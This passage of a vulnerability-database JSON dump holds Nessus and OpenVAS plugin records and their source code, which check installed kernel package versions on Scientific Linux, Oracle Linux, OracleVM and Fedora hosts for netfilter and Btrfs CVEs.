value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-abi-whitelists-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", 
reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-doc-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.36.1.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:02", "description": "Description of changes:\n\n[2.6.39-400.284.2.el6uek]\n- Btrfs: fix truncation of compressed and inlined extents (Divya Indi) \n[Orabug: 22307286] {CVE-2015-8374}\n- Btrfs: fix file corruption and data loss after cloning inline extents \n(Divya Indi) [Orabug: 22307286] {CVE-2015-8374}\n- netfilter: x_tables: make 
sure e->next_offset covers remaining blob \nsize (Florian Westphal) [Orabug: 24682073] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian \nWestphal) [Orabug: 24682071] {CVE-2016-4997} {CVE-2016-4998}\n\n[2.6.39-400.284.1.el6uek]\n- rds: schedule local connection activity in proper workqueue (Ajaykumar \nHotchandani) [Orabug: 22819661]\n- ib_core: make wait_event uninterruptible in ib_flush_fmr_pool() \n(Avinash Repaka) [Orabug: 24525022]\n- net/mlx4: Support shutdown() interface (Ajaykumar Hotchandani) \n[Orabug: 24616261]", "edition": 26, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-23T00:00:00", "title": "Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2016-3618)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8374", "CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-09-23T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2016-3618.NASL", "href": "https://www.tenable.com/plugins/nessus/93677", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3618.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93677);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-8374\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2016-3618)\");\n script_summary(english:\"Checks rpm output for the 
updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.284.2.el6uek]\n- Btrfs: fix truncation of compressed and inlined extents (Divya Indi) \n[Orabug: 22307286] {CVE-2015-8374}\n- Btrfs: fix file corruption and data loss after cloning inline extents \n(Divya Indi) [Orabug: 22307286] {CVE-2015-8374}\n- netfilter: x_tables: make sure e->next_offset covers remaining blob \nsize (Florian Westphal) [Orabug: 24682073] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian \nWestphal) [Orabug: 24682071] {CVE-2016-4997} {CVE-2016-4998}\n\n[2.6.39-400.284.1.el6uek]\n- rds: schedule local connection activity in proper workqueue (Ajaykumar \nHotchandani) [Orabug: 22819661]\n- ib_core: make wait_event uninterruptible in ib_flush_fmr_pool() \n(Avinash Repaka) [Orabug: 24525022]\n- net/mlx4: Support shutdown() interface (Ajaykumar Hotchandani) \n[Orabug: 24616261]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-September/006357.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-September/006358.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-8374\", \"CVE-2016-4997\", \"CVE-2016-4998\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-3618\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-2.6.39-400.284.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-2.6.39-400.284.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-devel-2.6.39-400.284.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-devel-2.6.39-400.284.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-doc-2.6.39-400.284.2.el5uek\")) flag++;\nif 
(rpm_exists(release:\"EL5\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-firmware-2.6.39-400.284.2.el5uek\")) flag++;\n\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.284.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.284.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.284.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.284.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.284.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.284.2.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:23:59", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Btrfs: fix truncation of compressed and inlined extents\n (Ashish Samant) [Orabug: 22307285] (CVE-2015-8374)\n\n - Btrfs: fix file corruption and data loss after cloning\n inline extents (Divya Indi) [Orabug: 22307285]\n (CVE-2015-8374)\n\n - netfilter: x_tables: make sure e->next_offset covers\n remaining blob size (Florian Westphal) [Orabug:\n 
24682074] (CVE-2016-4997) (CVE-2016-4998)\n\n - netfilter: x_tables: validate e->target_offset early\n (Florian Westphal) [Orabug: 24682074] (CVE-2016-4997)\n (CVE-2016-4998)\n\n - rds: schedule local connection activity in proper\n workqueue (Ajaykumar Hotchandani) [Orabug: 24624195]\n\n - ib_core: make wait_event uninterruptible in\n ib_flush_fmr_pool (Avinash Repaka) [Orabug: 24655952]\n\n - net/mlx4: Support shutdown interface (Gavin Shan)\n [Orabug: 24624181]", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-23T00:00:00", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2016-0133)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8374", "CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-09-23T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2016-0133.NASL", "href": "https://www.tenable.com/plugins/nessus/93680", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0133.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93680);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-8374\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2016-0133)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Btrfs: fix truncation of 
compressed and inlined extents\n (Ashish Samant) [Orabug: 22307285] (CVE-2015-8374)\n\n - Btrfs: fix file corruption and data loss after cloning\n inline extents (Divya Indi) [Orabug: 22307285]\n (CVE-2015-8374)\n\n - netfilter: x_tables: make sure e->next_offset covers\n remaining blob size (Florian Westphal) [Orabug:\n 24682074] (CVE-2016-4997) (CVE-2016-4998)\n\n - netfilter: x_tables: validate e->target_offset early\n (Florian Westphal) [Orabug: 24682074] (CVE-2016-4997)\n (CVE-2016-4998)\n\n - rds: schedule local connection activity in proper\n workqueue (Ajaykumar Hotchandani) [Orabug: 24624195]\n\n - ib_core: make wait_event uninterruptible in\n ib_flush_fmr_pool (Avinash Repaka) [Orabug: 24655952]\n\n - net/mlx4: Support shutdown interface (Gavin Shan)\n [Orabug: 24624181]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-September/000549.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ea6d000\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.11.2.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.11.2.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1583", "CVE-2016-4997", "CVE-2016-4470", "CVE-2016-4998"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-08-02T00:00:00", "id": "OPENVAS:1361412562310808914", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808914", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-63ee0999e4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-63ee0999e4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or 
any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808914\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:54:58 +0530 (Tue, 02 Aug 2016)\");\n script_cve_id(\"CVE-2016-4470\", \"CVE-2016-1583\", \"CVE-2016-4998\", \"CVE-2016-4997\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-63ee0999e4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-63ee0999e4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/57USMCT2MVQZR6AHRMSAA74YEHCO2OKA\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.4.14~200.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5728", "CVE-2016-1583", "CVE-2016-4997", "CVE-2016-4470", "CVE-2016-4998"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-07-02T00:00:00", "id": "OPENVAS:1361412562310808522", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808522", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-1c409313f4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-1c409313f4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
